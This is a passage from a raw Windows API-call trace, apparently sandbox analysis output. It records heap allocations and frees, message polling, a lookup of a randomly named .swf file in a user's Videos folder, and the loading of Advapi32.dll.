hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0214.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0214.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0214.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0214.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0214.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0214.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0214.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0214.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0214.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0214.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0214.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0214.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0214.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0214.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0214.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0214.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0214.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0214.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0214.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.728] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0214.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0214.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0214.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0214.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0214.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0214.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0214.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0214.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0214.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0214.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0214.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0214.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0214.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0214.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0214.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0214.729] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0214.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0214.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0214.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0214.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0214.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0214.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0214.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0214.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0214.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0214.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0214.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0214.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0214.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0214.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0214.731] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/SuK1W_b3QKmuHjRF.swf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79739500, ftCreationTime.dwHighDateTime=0x1d5d350, ftLastAccessTime.dwLowDateTime=0xd8434120, ftLastAccessTime.dwHighDateTime=0x1d5d594, ftLastWriteTime.dwLowDateTime=0xd8434120, ftLastWriteTime.dwHighDateTime=0x1d5d594, nFileSizeHigh=0x0, nFileSizeLow=0x366f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SuK1W_b3QKmuHjRF.swf", cAlternateFileName="SUK1W_~1.SWF")) returned 0x9e2138 [0214.731] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0214.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0214.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0214.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0214.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0214.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.731] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0214.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0214.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0214.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0214.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0214.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0214.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0214.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0214.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0214.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0214.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0214.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0214.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0214.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0214.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0214.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0214.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0214.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0214.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0214.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0214.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0214.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0214.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0214.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0214.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.732] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.733] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.733] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0214.733] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.733] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0214.733] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.733] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0214.733] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0214.733] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0214.734] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0214.734] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.734] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0214.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0214.734] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0214.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 